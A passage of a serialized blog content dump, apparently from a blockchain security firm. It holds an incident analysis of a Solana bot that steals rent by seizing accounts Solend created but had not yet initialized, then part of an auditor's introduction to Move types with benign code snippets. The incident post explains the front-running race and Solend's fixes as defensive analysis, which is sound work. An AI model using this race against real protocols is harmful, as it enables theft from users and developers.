fuzzed method had a trivial buffer overflow due to an arbitrary size limit on the input data. Implict assumptions can often undermine security.",{"type":27,"tag":36,"props":12639,"children":12640},{},[12641],{"type":33,"value":12642},"Especially with regard to onchain programs, it's important to consider what actually is a \"vulnerability\". Getting tokens from nothing is a more obvious example, but more subtle bugs can arise with increasingly complex defi interactions. Economic invariants are much harder to detect than say, memory corruption.",{"type":27,"tag":36,"props":12644,"children":12645},{},[12646],{"type":33,"value":12647},"A comprehensive evaluation of smart contracts relies on a deep understanding of economic implications within the Solana ecosystem.",{"type":27,"tag":10127,"props":12649,"children":12650},{},[12651],{"type":33,"value":10131},{"title":7,"searchDepth":244,"depth":244,"links":12653},[12654,12655,12656,12657],{"id":10207,"depth":244,"text":10210},{"id":11205,"depth":244,"text":11208},{"id":11509,"depth":244,"text":11512},{"id":12591,"depth":244,"text":12594},"content:blog:2022-04-26-spl-swap-rounding.md","blog/2022-04-26-spl-swap-rounding.md","blog/2022-04-26-spl-swap-rounding",{"_path":12662,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":12663,"description":12664,"image":12665,"date":12669,"isFeatured":19,"onBlogPage":19,"tags":12670,"body":12671,"_type":10152,"_id":12996,"_source":10154,"_file":12997,"_stem":12998,"_extension":10157},"/blog/2022-08-19-solend-rent-thief","The Story of the Curious Rent Thief","A tale of pickpockets preying on the Solana ecosystem. Read our investigation into the persistent theft of rent from uninitialized accounts. This is the story of the Solend rent thief.",{"src":12666,"width":12667,"height":12668},"/posts/rent-thief/title.jpg",970,826,"2022-08-19",[10169,10170],{"type":24,"children":12672,"toc":12989},[12673,12678,12684,12689,12694,12699,12705,12718,12766,12797,12806,12811,12816,12821,12827,12840,12856,12861,12866,12881,12885,12890,12905,12912,12917,12927,12934,12938,12943,12949,12954,12959,12964,12970,12975],{"type":27,"tag":36,"props":12674,"children":12675},{},[12676],{"type":33,"value":12677},"Recently, there’s been a rent thief. This bot steals money from uninitialized accounts across the Solana ecosystem, claiming and profiting from the rent. The Solend team noticed the bot when it attempted an attack on the new permissionless pools that are being developed (to be clear, funds stored in the main Solend protocol are completely unaffected). Let's dig into how rent thieving works by doing a case study on an attack to one of the permissionless pools.",{"type":27,"tag":28,"props":12679,"children":12681},{"id":12680},"background",[12682],{"type":33,"value":12683},"Background",{"type":27,"tag":36,"props":12685,"children":12686},{},[12687],{"type":33,"value":12688},"To understand how this exploit works, we first have to understand a bit about how rent works in Solana.",{"type":27,"tag":36,"props":12690,"children":12691},{},[12692],{"type":33,"value":12693},"Since accounts can store data that every validator needs to download, Solana charges a certain amount of rent based on the amount of data. However, accounts that have enough for 2 years of rent payments are considered rent-exempt as long as their balance never drops below the threshold. Fortunately, rent is very cheap, so it's not hard to make an account rent-exempt.",{"type":27,"tag":36,"props":12695,"children":12696},{},[12697],{"type":33,"value":12698},"As such, when creating new accounts, most programs will need to transfer some SOL into the new account to make it rent-exempt.",{"type":27,"tag":28,"props":12700,"children":12702},{"id":12701},"the-exploit",[12703],{"type":33,"value":12704},"The Exploit",{"type":27,"tag":36,"props":12706,"children":12707},{},[12708,12710,12716],{"type":33,"value":12709},"New reserves (also known as assets) are added to a Solend pool by calling the ",{"type":27,"tag":84,"props":12711,"children":12713},{"className":12712},[],[12714],{"type":33,"value":12715},"init_reserve",{"type":33,"value":12717}," function, which creates 6 new accounts to store data about the reserve:",{"type":27,"tag":12719,"props":12720,"children":12721},"ol",{},[12722,12727,12732,12737,12748,12753],{"type":27,"tag":1232,"props":12723,"children":12724},{},[12725],{"type":33,"value":12726},"reserve detail - stores information about the reserve e.g liquidity mint, mint decimals, oracles, configs, etc.",{"type":27,"tag":1232,"props":12728,"children":12729},{},[12730],{"type":33,"value":12731},"reserve liquidity token account - holds deposited tokens",{"type":27,"tag":1232,"props":12733,"children":12734},{},[12735],{"type":33,"value":12736},"fee receiver token account - account which will receive origination fees on borrows",{"type":27,"tag":1232,"props":12738,"children":12739},{},[12740,12742],{"type":33,"value":12741},"reserve collateral mint account - deposit receipt token, also known as ",{"type":27,"tag":84,"props":12743,"children":12745},{"className":12744},[],[12746],{"type":33,"value":12747},"cTokens",{"type":27,"tag":1232,"props":12749,"children":12750},{},[12751],{"type":33,"value":12752},"reserve collateral token account - holds users' collateral tokens",{"type":27,"tag":1232,"props":12754,"children":12755},{},[12756,12758,12764],{"type":33,"value":12757},"creator collateral token account - creator's ",{"type":27,"tag":84,"props":12759,"children":12761},{"className":12760},[],[12762],{"type":33,"value":12763},"cToken",{"type":33,"value":12765}," account",{"type":27,"tag":36,"props":12767,"children":12768},{},[12769,12771,12776,12778,12783,12785,12790,12792],{"type":33,"value":12770},"Account creation and initialization are ",{"type":27,"tag":942,"props":12772,"children":12773},{},[12774],{"type":33,"value":12775},"usually",{"type":33,"value":12777}," done within the same transactions. However, due to Solana's transaction size limit of 1232 bytes, the creation and initialization of these 6 accounts had to be separated into 2 transactions, creation and initialization. Here's what a call to ",{"type":27,"tag":84,"props":12779,"children":12781},{"className":12780},[],[12782],{"type":33,"value":12715},{"type":33,"value":12784}," is ",{"type":27,"tag":942,"props":12786,"children":12787},{},[12788],{"type":33,"value":12789},"supposed",{"type":33,"value":12791}," to look like:\n",{"type":27,"tag":126,"props":12793,"children":12796},{"src":12794,"alt":12795},"/posts/rent-thief/transacdiagram.png","drawing",[],{"type":27,"tag":36,"props":12798,"children":12799},{},[12800,12802],{"type":33,"value":12801},"Notice anything amiss? In between the two transactions, the account has rent money but no owner. This is where the rent thief comes in to snatch the account, along with its rent:\n",{"type":27,"tag":126,"props":12803,"children":12805},{"src":12804,"alt":12795},"/posts/rent-thief/attacktransac.png",[],{"type":27,"tag":36,"props":12807,"children":12808},{},[12809],{"type":33,"value":12810},"Since there was a roughly 40 second (50 slot) window in between the two transactions, such an attack was very consistent.",{"type":27,"tag":36,"props":12812,"children":12813},{},[12814],{"type":33,"value":12815},"Fortunately, rent is relatively cheap so the entire attack only extracts about 0.0082 SOL every iteration (4 token accounts each worth around 0.002 SOL), which is around 28 cents at the time of writing this article.",{"type":27,"tag":36,"props":12817,"children":12818},{},[12819],{"type":33,"value":12820},"Despite this lost cost, this is pretty annoying...",{"type":27,"tag":28,"props":12822,"children":12824},{"id":12823},"example",[12825],{"type":33,"value":12826},"Example",{"type":27,"tag":36,"props":12828,"children":12829},{},[12830,12832,12839],{"type":33,"value":12831},"Let's take a look at ",{"type":27,"tag":47,"props":12833,"children":12836},{"href":12834,"rel":12835},"https://explorer.solana.com/address/2PUTo74Vbt9fXVoTywjTFZNnWGckWS98HnruXvZJaj4N",[51],[12837],{"type":33,"value":12838},"a real attack",{"type":33,"value":1041},{"type":27,"tag":36,"props":12841,"children":12842},{},[12843,12850,12852],{"type":27,"tag":47,"props":12844,"children":12847},{"href":12845,"rel":12846},"https://explorer.solana.com/tx/9yon9Av2sBq78bZ92Pa28p8gef5MUEQL3sBLGVzxK3RNGYsN2nLnTrbqS1wMCvJdinKE8CC9SwCuUYuNBwrNFNy",[51],[12848],{"type":33,"value":12849},"Transaction 1",{"type":33,"value":12851},":\n",{"type":27,"tag":126,"props":12853,"children":12855},{"alt":7,"src":12854},"https://i.imgur.com/xJvIwgc.png",[],{"type":27,"tag":36,"props":12857,"children":12858},{},[12859],{"type":33,"value":12860},"(...more accounts truncated)",{"type":27,"tag":36,"props":12862,"children":12863},{},[12864],{"type":33,"value":12865},"The developer creates a couple accounts and transfers enough SOL for them to be rent-exempt. This took place in slot 136,580,113.",{"type":27,"tag":36,"props":12867,"children":12868},{},[12869,12876,12877],{"type":27,"tag":47,"props":12870,"children":12873},{"href":12871,"rel":12872},"https://explorer.solana.com/tx/22beQSDReFGK4KAgarAz4MbibpxaFHiARd3yaCDZ4wmKSNoTcxmKMp6uRNA2CY4xAAZVZZCDg522aJ7jXftyhtSE",[51],[12874],{"type":33,"value":12875},"Attacker's Transaction",{"type":33,"value":12851},{"type":27,"tag":126,"props":12878,"children":12880},{"alt":7,"src":12879},"https://i.imgur.com/CpSKuL3.png",[],{"type":27,"tag":36,"props":12882,"children":12883},{},[12884],{"type":33,"value":12860},{"type":27,"tag":36,"props":12886,"children":12887},{},[12888],{"type":33,"value":12889},"As detailed before, the attacker takes ownership of the newly created accounts. This took place in slot 136,580,154, which is 41 slots (29 seconds) after the initial transaction.",{"type":27,"tag":36,"props":12891,"children":12892},{},[12893,12900,12901],{"type":27,"tag":47,"props":12894,"children":12897},{"href":12895,"rel":12896},"https://explorer.solana.com/tx/beYo1YBCa4fQ8swdJchx9s4qtgDQV4oVSEqwAX7UpHan4U4Jsv1oxY2V2ZxE77pBQHzYwV4gCXpDDKTgM7kBT4y",[51],[12898],{"type":33,"value":12899},"Transaction 2",{"type":33,"value":12851},{"type":27,"tag":126,"props":12902,"children":12904},{"alt":7,"src":12903},"https://i.imgur.com/of0GIdw.png",[],{"type":27,"tag":36,"props":12906,"children":12907},{},[12908],{"type":27,"tag":126,"props":12909,"children":12911},{"alt":7,"src":12910},"https://i.imgur.com/0STSyv8.png",[],{"type":27,"tag":36,"props":12913,"children":12914},{},[12915],{"type":33,"value":12916},"The developer attempts to take ownership of the account, but it fails with the error \"account or token already in use\" since the attacker took ownership of it. This took place in slot 136,580,167, which is 13 slots (9 seconds) after the attacker's transaction. In total, that's a 54 slot-gap (38 seconds) between the two Solend transactions.",{"type":27,"tag":36,"props":12918,"children":12919},{},[12920,12926],{"type":27,"tag":47,"props":12921,"children":12924},{"href":12922,"rel":12923},"https://explorer.solana.com/tx/3D45bCbbeSEaigz3RX6GRKuoDSok3FHMi5Z2N5HDXcPjqMzu3Qx5iEoXh56RWg1mn7w9ZuZifD91n1DwnPjdaW2G",[51],[12925],{"type":33,"value":12875},{"type":33,"value":736},{"type":27,"tag":36,"props":12928,"children":12929},{},[12930],{"type":27,"tag":126,"props":12931,"children":12933},{"alt":7,"src":12932},"https://i.imgur.com/AmSPdmy.png",[],{"type":27,"tag":36,"props":12935,"children":12936},{},[12937],{"type":33,"value":12860},{"type":27,"tag":36,"props":12939,"children":12940},{},[12941],{"type":33,"value":12942},"Now that the attack is over, the attacker closes the accounts, transferring the rent money to themselves. The total money stolen during this attack was 0.00815212 SOL.",{"type":27,"tag":28,"props":12944,"children":12946},{"id":12945},"impact",[12947],{"type":33,"value":12948},"Impact",{"type":27,"tag":36,"props":12950,"children":12951},{},[12952],{"type":33,"value":12953},"Rent-thieving attacks don't steal much money.",{"type":27,"tag":36,"props":12955,"children":12956},{},[12957],{"type":33,"value":12958},"They can only make a small profit very infrequently as Solana rent is cheap and there are only a handful of large services that separate account creation and initialization. In addition, this stratedgy doesn't scale well, since such non-atomic account creation is relatively infrequent.",{"type":27,"tag":36,"props":12960,"children":12961},{},[12962],{"type":33,"value":12963},"However, it's still obnoxious even if the monetary impact is minimal. Transactions will fail and need to be remade, impacting usability.",{"type":27,"tag":28,"props":12965,"children":12967},{"id":12966},"solution",[12968],{"type":33,"value":12969},"Solution",{"type":27,"tag":36,"props":12971,"children":12972},{},[12973],{"type":33,"value":12974},"As a temporary stopgap, Solend refactored their codebase to lower the 40 second delay between transactions to around 15 seconds (20 slots), making an attack much more difficult and inconsistent.",{"type":27,"tag":36,"props":12976,"children":12977},{},[12978,12980,12987],{"type":33,"value":12979},"As a more permenant solution, Solend implemented ",{"type":27,"tag":47,"props":12981,"children":12984},{"href":12982,"rel":12983},"https://explorer.solana.com/tx/3DR74oQh966HbozLPYFqTgCmQWbUNSBkjUcEs7CuWxMPNxM3mBzqH7Gqu1mVRBRxNSTWJBcJkTnCzmoqD6kPYMXE?cluster=devnet",[51],[12985],{"type":33,"value":12986},"an onchain program",{"type":33,"value":12988}," which handles account creation, allowing them to fit all the relevant instructions into one transaction.",{"title":7,"searchDepth":244,"depth":244,"links":12990},[12991,12992,12993,12994,12995],{"id":12680,"depth":244,"text":12683},{"id":12701,"depth":244,"text":12704},{"id":12823,"depth":244,"text":12826},{"id":12945,"depth":244,"text":12948},{"id":12966,"depth":244,"text":12969},"content:blog:2022-08-19-solend-rent-thief.md","blog/2022-08-19-solend-rent-thief.md","blog/2022-08-19-solend-rent-thief",{"_path":13000,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":13001,"description":13002,"author":13003,"image":13004,"date":13008,"isFeatured":19,"onBlogPage":19,"body":13009,"_type":10152,"_id":16532,"_source":10154,"_file":16533,"_stem":16534,"_extension":10157},"/blog/2022-09-06-move-introduction","Move: An Auditor's Introduction","What actually makes Move secure? A discussion of Move's typing system and formal verification.","robert",{"src":13005,"height":13006,"width":13007},"/posts/move-intro/title.jpg",1221,1400,"2022-09-06",{"type":24,"children":13010,"toc":16527},[13011,13016,13021,13040,13046,13058,13154,13162,13282,13290,13312,13465,13470,13728,13750,13784,13789,13809,13814,13825,13837,14049,14061,14075,14088,14345,14357,14579,14584,14612,14758,14777,14782,15047,15059,15064,15077,15083,15088,15093,15105,15119,15124,15221,15233,15246,15520,15525,15537,15542,15596,15616,15621,16496,16500,16505,16510,16523],{"type":27,"tag":36,"props":13012,"children":13013},{},[13014],{"type":33,"value":13015},"As part of our work, we seek to understand how to eliminate vulnerability classes. Designing safer languages enables developers to write code with confidence. How exactly does Move lend itself to safer programming practices? What can we learn from Move to generalize secure design principles for other execution environments?",{"type":27,"tag":36,"props":13017,"children":13018},{},[13019],{"type":33,"value":13020},"Lately, there appears to be many buzzwords floating around. Formal verification, type based safety, \"rust but for blockchain\".",{"type":27,"tag":36,"props":13022,"children":13023},{},[13024,13026,13031,13033,13038],{"type":33,"value":13025},"In this piece I'll seek to discuss exactly ",{"type":27,"tag":942,"props":13027,"children":13028},{},[13029],{"type":33,"value":13030},"how",{"type":33,"value":13032}," move lends itself to more secure programming practices, potential shortcomings, and practical design tips for protocol developers looking to build ",{"type":27,"tag":942,"props":13034,"children":13035},{},[13036],{"type":33,"value":13037},"structurally",{"type":33,"value":13039}," safer programs.",{"type":27,"tag":28,"props":13041,"children":13043},{"id":13042},"types",[13044],{"type":33,"value":13045},"Types",{"type":27,"tag":36,"props":13047,"children":13048},{},[13049,13051,13057],{"type":33,"value":13050},"One of the key selling points of Move is the use of typed resources. Aptos and Sui have slight variations in how they materialize this pattern, but as an example take ",{"type":27,"tag":84,"props":13052,"children":13054},{"className":13053},[],[13055],{"type":33,"value":13056},"coin.move",{"type":33,"value":1041},{"type":27,"tag":101,"props":13059,"children":13061},{"className":10270,"code":13060,"language":10269,"meta":7,"style":7}," /// Main structure representing a coin/token in an account's custody.\n struct Coin\u003Cphantom CoinType> has store {\n /// Amount of coin this address has.\n value: u64,\n }\n",[13062],{"type":27,"tag":84,"props":13063,"children":13064},{"__ignoreMap":7},[13065,13073,13118,13126,13147],{"type":27,"tag":207,"props":13066,"children":13067},{"class":209,"line":210},[13068],{"type":27,"tag":207,"props":13069,"children":13070},{"style":4647},[13071],{"type":33,"value":13072}," /// Main structure representing a coin/token in an account's custody.\n",{"type":27,"tag":207,"props":13074,"children":13075},{"class":209,"line":244},[13076,13081,13086,13090,13095,13100,13104,13109,13114],{"type":27,"tag":207,"props":13077,"children":13078},{"style":214},[13079],{"type":33,"value":13080}," struct",{"type":27,"tag":207,"props":13082,"children":13083},{"style":8920},[13084],{"type":33,"value":13085}," Coin",{"type":27,"tag":207,"props":13087,"children":13088},{"style":238},[13089],{"type":33,"value":9257},{"type":27,"tag":207,"props":13091,"children":13092},{"style":220},[13093],{"type":33,"value":13094},"phantom",{"type":27,"tag":207,"props":13096,"children":13097},{"style":8920},[13098],{"type":33,"value":13099}," CoinType",{"type":27,"tag":207,"props":13101,"children":13102},{"style":238},[13103],{"type":33,"value":9316},{"type":27,"tag":207,"props":13105,"children":13106},{"style":220},[13107],{"type":33,"value":13108},"has",{"type":27,"tag":207,"props":13110,"children":13111},{"style":220},[13112],{"type":33,"value":13113}," store",{"type":27,"tag":207,"props":13115,"children":13116},{"style":238},[13117],{"type":33,"value":384},{"type":27,"tag":207,"props":13119,"children":13120},{"class":209,"line":270},[13121],{"type":27,"tag":207,"props":13122,"children":13123},{"style":4647},[13124],{"type":33,"value":13125}," /// Amount of coin this address has.\n",{"type":27,"tag":207,"props":13127,"children":13128},{"class":209,"line":296},[13129,13134,13138,13143],{"type":27,"tag":207,"props":13130,"children":13131},{"style":220},[13132],{"type":33,"value":13133}," value",{"type":27,"tag":207,"props":13135,"children":13136},{"style":226},[13137],{"type":33,"value":736},{"type":27,"tag":207,"props":13139,"children":13140},{"style":8920},[13141],{"type":33,"value":13142}," u64",{"type":27,"tag":207,"props":13144,"children":13145},{"style":238},[13146],{"type":33,"value":1842},{"type":27,"tag":207,"props":13148,"children":13149},{"class":209,"line":445},[13150],{"type":27,"tag":207,"props":13151,"children":13152},{"style":238},[13153],{"type":33,"value":5312},{"type":27,"tag":36,"props":13155,"children":13156},{},[13157],{"type":27,"tag":942,"props":13158,"children":13159},{},[13160],{"type":33,"value":13161},"aptos",{"type":27,"tag":101,"props":13163,"children":13165},{"className":10270,"code":13164,"language":10269,"meta":7,"style":7}," /// A coin of type `T` worth `value`. Transferable and storable\n struct Coin\u003Cphantom T> has key, store {\n id: UID,\n balance: Balance\u003CT>\n }\n",[13166],{"type":27,"tag":84,"props":13167,"children":13168},{"__ignoreMap":7},[13169,13177,13227,13244,13275],{"type":27,"tag":207,"props":13170,"children":13171},{"class":209,"line":210},[13172],{"type":27,"tag":207,"props":13173,"children":13174},{"style":4647},[13175],{"type":33,"value":13176}," /// A coin of type `T` worth `value`. Transferable and storable\n",{"type":27,"tag":207,"props":13178,"children":13179},{"class":209,"line":244},[13180,13184,13188,13192,13196,13201,13205,13209,13214,13218,13223],{"type":27,"tag":207,"props":13181,"children":13182},{"style":214},[13183],{"type":33,"value":13080},{"type":27,"tag":207,"props":13185,"children":13186},{"style":8920},[13187],{"type":33,"value":13085},{"type":27,"tag":207,"props":13189,"children":13190},{"style":238},[13191],{"type":33,"value":9257},{"type":27,"tag":207,"props":13193,"children":13194},{"style":220},[13195],{"type":33,"value":13094},{"type":27,"tag":207,"props":13197,"children":13198},{"style":8920},[13199],{"type":33,"value":13200}," T",{"type":27,"tag":207,"props":13202,"children":13203},{"style":238},[13204],{"type":33,"value":9316},{"type":27,"tag":207,"props":13206,"children":13207},{"style":220},[13208],{"type":33,"value":13108},{"type":27,"tag":207,"props":13210,"children":13211},{"style":220},[13212],{"type":33,"value":13213}," key",{"type":27,"tag":207,"props":13215,"children":13216},{"style":238},[13217],{"type":33,"value":1123},{"type":27,"tag":207,"props":13219,"children":13220},{"style":220},[13221],{"type":33,"value":13222},"store",{"type":27,"tag":207,"props":13224,"children":13225},{"style":238},[13226],{"type":33,"value":384},{"type":27,"tag":207,"props":13228,"children":13229},{"class":209,"line":270},[13230,13235,13239],{"type":27,"tag":207,"props":13231,"children":13232},{"style":220},[13233],{"type":33,"value":13234}," id",{"type":27,"tag":207,"props":13236,"children":13237},{"style":226},[13238],{"type":33,"value":736},{"type":27,"tag":207,"props":13240,"children":13241},{"style":238},[13242],{"type":33,"value":13243}," UID,\n",{"type":27,"tag":207,"props":13245,"children":13246},{"class":209,"line":296},[13247,13252,13256,13261,13265,13270],{"type":27,"tag":207,"props":13248,"children":13249},{"style":220},[13250],{"type":33,"value":13251}," balance",{"type":27,"tag":207,"props":13253,"children":13254},{"style":226},[13255],{"type":33,"value":736},{"type":27,"tag":207,"props":13257,"children":13258},{"style":8920},[13259],{"type":33,"value":13260}," Balance",{"type":27,"tag":207,"props":13262,"children":13263},{"style":238},[13264],{"type":33,"value":9257},{"type":27,"tag":207,"props":13266,"children":13267},{"style":8920},[13268],{"type":33,"value":13269},"T",{"type":27,"tag":207,"props":13271,"children":13272},{"style":238},[13273],{"type":33,"value":13274},">\n",{"type":27,"tag":207,"props":13276,"children":13277},{"class":209,"line":445},[13278],{"type":27,"tag":207,"props":13279,"children":13280},{"style":238},[13281],{"type":33,"value":5312},{"type":27,"tag":36,"props":13283,"children":13284},{},[13285],{"type":27,"tag":942,"props":13286,"children":13287},{},[13288],{"type":33,"value":13289},"sui",{"type":27,"tag":36,"props":13291,"children":13292},{},[13293,13295,13302,13304,13310],{"type":33,"value":13294},"Pulling an example from ",{"type":27,"tag":47,"props":13296,"children":13299},{"href":13297,"rel":13298},"https://pontem.network/",[51],[13300],{"type":33,"value":13301},"Pontem Network's",{"type":33,"value":13303}," Liquidswap DEX implementation on Aptos, we can see that ",{"type":27,"tag":84,"props":13305,"children":13307},{"className":13306},[],[13308],{"type":33,"value":13309},"LiquidityPool",{"type":33,"value":13311}," natively embeds this type information into it's fields.",{"type":27,"tag":101,"props":13313,"children":13315},{"className":10270,"code":13314,"language":10269,"meta":7,"style":7}," /// Liquidity pool with reserves.\n struct LiquidityPool\u003Cphantom X, phantom Y, phantom LP> has key {\n coin_x_reserve: Coin\u003CX>,\n coin_y_reserve: Coin\u003CY>,\n // ...\n }\n",[13316],{"type":27,"tag":84,"props":13317,"children":13318},{"__ignoreMap":7},[13319,13327,13391,13421,13450,13458],{"type":27,"tag":207,"props":13320,"children":13321},{"class":209,"line":210},[13322],{"type":27,"tag":207,"props":13323,"children":13324},{"style":4647},[13325],{"type":33,"value":13326}," /// Liquidity pool with reserves.\n",{"type":27,"tag":207,"props":13328,"children":13329},{"class":209,"line":244},[13330,13335,13340,13344,13348,13353,13357,13361,13366,13370,13374,13379,13383,13387],{"type":27,"tag":207,"props":13331,"children":13332},{"style":214},[13333],{"type":33,"value":13334}," struct",{"type":27,"tag":207,"props":13336,"children":13337},{"style":8920},[13338],{"type":33,"value":13339}," LiquidityPool",{"type":27,"tag":207,"props":13341,"children":13342},{"style":238},[13343],{"type":33,"value":9257},{"type":27,"tag":207,"props":13345,"children":13346},{"style":220},[13347],{"type":33,"value":13094},{"type":27,"tag":207,"props":13349,"children":13350},{"style":8920},[13351],{"type":33,"value":13352}," X",{"type":27,"tag":207,"props":13354,"children":13355},{"style":238},[13356],{"type":33,"value":1123},{"type":27,"tag":207,"props":13358,"children":13359},{"style":220},[13360],{"type":33,"value":13094},{"type":27,"tag":207,"props":13362,"children":13363},{"style":8920},[13364],{"type":33,"value":13365}," Y",{"type":27,"tag":207,"props":13367,"children":13368},{"style":238},[13369],{"type":33,"value":1123},{"type":27,"tag":207,"props":13371,"children":13372},{"style":220},[13373],{"type":33,"value":13094},{"type":27,"tag":207,"props":13375,"children":13376},{"style":238},[13377],{"type":33,"value":13378}," LP> ",{"type":27,"tag":207,"props":13380,"children":13381},{"style":220},[13382],{"type":33,"value":13108},{"type":27,"tag":207,"props":13384,"children":13385},{"style":220},[13386],{"type":33,"value":13213},{"type":27,"tag":207,"props":13388,"children":13389},{"style":238},[13390],{"type":33,"value":384},{"type":27,"tag":207,"props":13392,"children":13393},{"class":209,"line":270},[13394,13399,13403,13407,13411,13416],{"type":27,"tag":207,"props":13395,"children":13396},{"style":220},[13397],{"type":33,"value":13398}," coin_x_reserve",{"type":27,"tag":207,"props":13400,"children":13401},{"style":226},[13402],{"type":33,"value":736},{"type":27,"tag":207,"props":13404,"children":13405},{"style":8920},[13406],{"type":33,"value":13085},{"type":27,"tag":207,"props":13408,"children":13409},{"style":238},[13410],{"type":33,"value":9257},{"type":27,"tag":207,"props":13412,"children":13413},{"style":8920},[13414],{"type":33,"value":13415},"X",{"type":27,"tag":207,"props":13417,"children":13418},{"style":238},[13419],{"type":33,"value":13420},">,\n",{"type":27,"tag":207,"props":13422,"children":13423},{"class":209,"line":296},[13424,13429,13433,13437,13441,13446],{"type":27,"tag":207,"props":13425,"children":13426},{"style":220},[13427],{"type":33,"value":13428}," coin_y_reserve",{"type":27,"tag":207,"props":13430,"children":13431},{"style":226},[13432],{"type":33,"value":736},{"type":27,"tag":207,"props":13434,"children":13435},{"style":8920},[13436],{"type":33,"value":13085},{"type":27,"tag":207,"props":13438,"children":13439},{"style":238},[13440],{"type":33,"value":9257},{"type":27,"tag":207,"props":13442,"children":13443},{"style":8920},[13444],{"type":33,"value":13445},"Y",{"type":27,"tag":207,"props":13447,"children":13448},{"style":238},[13449],{"type":33,"value":13420},{"type":27,"tag":207,"props":13451,"children":13452},{"class":209,"line":445},[13453],{"type":27,"tag":207,"props":13454,"children":13455},{"style":4647},[13456],{"type":33,"value":13457}," // ...\n",{"type":27,"tag":207,"props":13459,"children":13460},{"class":209,"line":867},[13461],{"type":27,"tag":207,"props":13462,"children":13463},{"style":238},[13464],{"type":33,"value":10645},{"type":27,"tag":36,"props":13466,"children":13467},{},[13468],{"type":33,"value":13469},"This has the advantage of aligning type information at compile time. It would be difficult to accidentally pass in the wrong type of coin to a function.",{"type":27,"tag":101,"props":13471,"children":13473},{"className":10270,"code":13472,"language":10269,"meta":7,"style":7}," public fun mint\u003CX, Y, LP>(\n pool_addr: address,\n coin_x: Coin\u003CX>,\n coin_y: Coin\u003CY>\n ): Coin\u003CLP> acquires LiquidityPool, EventsStore {\n // ...\n\n let (x_reserve_size, y_reserve_size) = get_reserves_size\u003CX, Y, LP>(pool_addr);\n",[13474],{"type":27,"tag":84,"props":13475,"children":13476},{"__ignoreMap":7},[13477,13516,13537,13565,13593,13644,13652,13659],{"type":27,"tag":207,"props":13478,"children":13479},{"class":209,"line":210},[13480,13485,13490,13495,13499,13503,13507,13511],{"type":27,"tag":207,"props":13481,"children":13482},{"style":220},[13483],{"type":33,"value":13484}," public",{"type":27,"tag":207,"props":13486,"children":13487},{"style":220},[13488],{"type":33,"value":13489}," fun",{"type":27,"tag":207,"props":13491,"children":13492},{"style":220},[13493],{"type":33,"value":13494}," mint",{"type":27,"tag":207,"props":13496,"children":13497},{"style":238},[13498],{"type":33,"value":9257},{"type":27,"tag":207,"props":13500,"children":13501},{"style":8920},[13502],{"type":33,"value":13415},{"type":27,"tag":207,"props":13504,"children":13505},{"style":238},[13506],{"type":33,"value":1123},{"type":27,"tag":207,"props":13508,"children":13509},{"style":8920},[13510],{"type":33,"value":13445},{"type":27,"tag":207,"props":13512,"children":13513},{"style":238},[13514],{"type":33,"value":13515},", LP>(\n",{"type":27,"tag":207,"props":13517,"children":13518},{"class":209,"line":244},[13519,13524,13528,13533],{"type":27,"tag":207,"props":13520,"children":13521},{"style":220},[13522],{"type":33,"value":13523}," pool_addr",{"type":27,"tag":207,"props":13525,"children":13526},{"style":226},[13527],{"type":33,"value":736},{"type":27,"tag":207,"props":13529,"children":13530},{"style":220},[13531],{"type":33,"value":13532}," address",{"type":27,"tag":207,"props":13534,"children":13535},{"style":238},[13536],{"type":33,"value":1842},{"type":27,"tag":207,"props":13538,"children":13539},{"class":209,"line":270},[13540,13545,13549,13553,13557,13561],{"type":27,"tag":207,"props":13541,"children":13542},{"style":220},[13543],{"type":33,"value":13544}," coin_x",{"type":27,"tag":207,"props":13546,"children":13547},{"style":226},[13548],{"type":33,"value":736},{"type":27,"tag":207,"props":13550,"children":13551},{"style":8920},[13552],{"type":33,"value":13085},{"type":27,"tag":207,"props":13554,"children":13555},{"style":238},[13556],{"type":33,"value":9257},{"type":27,"tag":207,"props":13558,"children":13559},{"style":8920},[13560],{"type":33,"value":13415},{"type":27,"tag":207,"props":13562,"children":13563},{"style":238},[13564],{"type":33,"value":13420},{"type":27,"tag":207,"props":13566,"children":13567},{"class":209,"line":296},[13568,13573,13577,13581,13585,13589],{"type":27,"tag":207,"props":13569,"children":13570},{"style":220},[13571],{"type":33,"value":13572}," coin_y",{"type":27,"tag":207,"props":13574,"children":13575},{"style":226},[13576],{"type":33,"value":736},{"type":27,"tag":207,"props":13578,"children":13579},{"style":8920},[13580],{"type":33,"value":13085},{"type":27,"tag":207,"props":13582,"children":13583},{"style":238},[13584],{"type":33,"value":9257},{"type":27,"tag":207,"props":13586,"children":13587},{"style":8920},[13588],{"type":33,"value":13445},{"type":27,"tag":207,"props":13590,"children":13591},{"style":238},[13592],{"type":33,"value":13274},{"type":27,"tag":207,"props":13594,"children":13595},{"class":209,"line":445},[13596,13601,13605,13609,13613,13618,13622,13627,13631,13635,13640],{"type":27,"tag":207,"props":13597,"children":13598},{"style":238},[13599],{"type":33,"value":13600}," )",{"type":27,"tag":207,"props":13602,"children":13603},{"style":226},[13604],{"type":33,"value":736},{"type":27,"tag":207,"props":13606,"children":13607},{"style":8920},[13608],{"type":33,"value":13085},{"type":27,"tag":207,"props":13610,"children":13611},{"style":238},[13612],{"type":33,"value":9257},{"type":27,"tag":207,"props":13614,"children":13615},{"style":8920},[13616],{"type":33,"value":13617},"LP",{"type":27,"tag":207,"props":13619,"children":13620},{"style":238},[13621],{"type":33,"value":9316},{"type":27,"tag":207,"props":13623,"children":13624},{"style":220},[13625],{"type":33,"value":13626},"acquires",{"type":27,"tag":207,"props":13628,"children":13629},{"style":8920},[13630],{"type":33,"value":13339},{"type":27,"tag":207,"props":13632,"children":13633},{"style":238},[13634],{"type":33,"value":1123},{"type":27,"tag":207,"props":13636,"children":13637},{"style":8920},[13638],{"type":33,"value":13639},"EventsStore",{"type":27,"tag":207,"props":13641,"children":13642},{"style":238},[13643],{"type":33,"value":384},{"type":27,"tag":207,"props":13645,"children":13646},{"class":209,"line":867},[13647],{"type":27,"tag":207,"props":13648,"children":13649},{"style":4647},[13650],{"type":33,"value":13651}," // ...\n",{"type":27,"tag":207,"props":13653,"children":13654},{"class":209,"line":892},[13655],{"type":27,"tag":207,"props":13656,"children":13657},{"emptyLinePlaceholder":19},[13658],{"type":33,"value":2062},{"type":27,"tag":207,"props":13660,"children":13661},{"class":209,"line":1475},[13662,13667,13671,13676,13680,13685,13689,13693,13698,13702,13706,13710,13714,13719,13724],{"type":27,"tag":207,"props":13663,"children":13664},{"style":214},[13665],{"type":33,"value":13666}," 